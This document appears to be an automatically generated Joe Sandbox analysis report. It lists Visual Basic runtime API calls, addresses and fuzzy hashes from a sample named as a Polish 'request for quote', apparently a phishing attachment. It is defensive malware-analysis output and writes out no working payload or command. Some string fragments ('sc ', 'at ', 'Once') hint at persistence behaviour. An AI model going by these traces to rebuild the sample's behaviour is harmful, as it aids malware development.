                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041ED1E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ED4E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0041ED7B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041ED8A
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041ED96
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EDB7
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0041EDE4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EDF3
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041EDFF
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
                                                                                                                                                                                                                                                      • #598.MSVBVM60 ref: 0041EE38
                                                                                                                                                                                                                                                      • #611.MSVBVM60(00000000), ref: 0041EE47
                                                                                                                                                                                                                                                      • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
                                                                                                                                                                                                                                                      • #705.MSVBVM60(?,00000004), ref: 0041EE86
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EE94
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEC4
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEFD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF15
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF2C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF45
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF5C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF78
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF92
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EFAD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0041EFD8
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF), ref: 0041F076
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0041F0B5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041F146
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Ansi$#600$#537Chkstk$#525#598#606#611#616#661#705Construct2CopyExitOverflowProcUnicode
                                                                                                                                                                                                                                                      • String ID: sc
                                                                                                                                                                                                                                                      • API String ID: 4194055773-3695712183
                                                                                                                                                                                                                                                      • Opcode ID: 10bc9b33671cf09b2be45f840a71d39027787730a0e625a90ceabfc0ea0b6571
                                                                                                                                                                                                                                                      • Instruction ID: 1563775ad5923100dd4d9da9d865aeb77b3bef46a6a949fae2e94889091cf12a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10bc9b33671cf09b2be45f840a71d39027787730a0e625a90ceabfc0ea0b6571
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44510875A00219DBDB24EFA0DE49BDD7BB4BB44301F1081A9E14AF72A1DB385E85CF18
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040D1CF
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D22E
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?), ref: 0040D264
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004077C4,00000020), ref: 0040D2A8
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,?), ref: 0040D2DB
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0040D522
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001), ref: 0040D56C
                                                                                                                                                                                                                                                      • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
                                                                                                                                                                                                                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0040D611
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 435708370-0
                                                                                                                                                                                                                                                      • Opcode ID: 9749cd1c4f2270137a3b9f12548bda0f3a75b9f7e342ec696e87967a4431a42f
                                                                                                                                                                                                                                                      • Instruction ID: fcce0bd25021f4c55c21d17dcae381c1af859cd8f25d7f86317db57e57613949
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9749cd1c4f2270137a3b9f12548bda0f3a75b9f7e342ec696e87967a4431a42f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE11774D00208EFDB14DFA4D988ADEBBB5FF48700F20816AE509BB291D7759985CFA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,6CF7A323,6CF8D8B1,?), ref: 00418D1E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
                                                                                                                                                                                                                                                      • __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
                                                                                                                                                                                                                                                      • __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00418D85
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
                                                                                                                                                                                                                                                      • __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00418DAA
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
                                                                                                                                                                                                                                                      • __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000084), ref: 00418EAD
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,0000008C), ref: 00418F3C
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000278), ref: 00418FA4
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0), ref: 00419013
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041905F
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00CC0020), ref: 00419078
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 004190C9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AnsiError$CheckHresult$System$Move$ChkstkFreeListOverflow
                                                                                                                                                                                                                                                      • String ID: DISPLAY
                                                                                                                                                                                                                                                      • API String ID: 226413627-865373369
                                                                                                                                                                                                                                                      • Opcode ID: 6a05cb85e494f777eff56ca68d8a3db58f76e04dcff3142400466dc6ab06a324
                                                                                                                                                                                                                                                      • Instruction ID: a062e320558ca6fff28f45832f19da439656b4792b9b718fe8d8c950d48b1413
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a05cb85e494f777eff56ca68d8a3db58f76e04dcff3142400466dc6ab06a324
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BA12875940219EFDB24DF50CD89FEAB7B4FB48300F1085EAE50AA7290D7745A84DF64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A200
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                                                                                                                      • String ID: @2@
                                                                                                                                                                                                                                                      • API String ID: 653519621-343359795
                                                                                                                                                                                                                                                      • Opcode ID: f6150098f43948e90806c12a3c2991bf29e9ad6a5940e6859ad760a911545430
                                                                                                                                                                                                                                                      • Instruction ID: 4db5018945ba0d113f70efc3efbfc2014598e300a345278f9012389ef60e75fd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6150098f43948e90806c12a3c2991bf29e9ad6a5940e6859ad760a911545430
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B741CCB2900149EFCB04EFE4DE49EDEBBB9EB48705F108159F602B61A0DB756A44CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040D86E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,00000000,Function_000032B6), ref: 0040D8B5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040D8ED
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D8F8
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040D911
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D91C
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040D937
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040D952
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D95D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040D977
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D982
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000), ref: 0040D99D
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040DA0C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040DA33
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040DA3E
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00000000), ref: 0040DA4D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$List$#580ChkstkError
                                                                                                                                                                                                                                                      • String ID: MR$ RO$C$Once
                                                                                                                                                                                                                                                      • API String ID: 3619039755-2541133078
                                                                                                                                                                                                                                                      • Opcode ID: 51f8670c5577a9d60adca4f5475f3347c83c433d099adc03e5839f88fcd5abb2
                                                                                                                                                                                                                                                      • Instruction ID: cb69084c84231b04a80139a54d6e55147a6181afad02e942266a88f85e06280e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51f8670c5577a9d60adca4f5475f3347c83c433d099adc03e5839f88fcd5abb2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67515C71A00204EFD700DFD4DE8ABAE77B4EF48704F60816AF501B72A1DBB85A45CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( !@,00409278,?,00000001), ref: 00415D70
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00415D7D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00409280,00000000,?,00000001), ref: 00415D85
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00415D8C
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00415D90
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000001), ref: 00415DA2
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( !@,004095AC,?,-00000001), ref: 00415DD0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DD7
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00409280,00000000,?,-00000001), ref: 00415DDF
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DE6
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 00415DEB
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 00415DFD
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60 ref: 00415E10
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?,?), ref: 00415E43
                                                                                                                                                                                                                                                      • #631.MSVBVM60(?,-00000002,?,?), ref: 00415E59
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 00415E64
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 00415E69
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 00415EB9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                                                                                                                      • String ID: !@$AHA !@
                                                                                                                                                                                                                                                      • API String ID: 43011225-1712571822
                                                                                                                                                                                                                                                      • Opcode ID: 1d0fd53414f82b8a5140894465822627a2b2e4415d5277366693652de8302a8f
                                                                                                                                                                                                                                                      • Instruction ID: 81cdc0ee054e8d02015220d1a651034c4d5d80587a79404b4572d844a8d9d7d0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d0fd53414f82b8a5140894465822627a2b2e4415d5277366693652de8302a8f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC412E75E00208AFC704DFA4DD85EEE7BB9EB88701F10416AF905E72A1DB749D45CBA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0040D0ED
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040D0FA
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040D1CF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
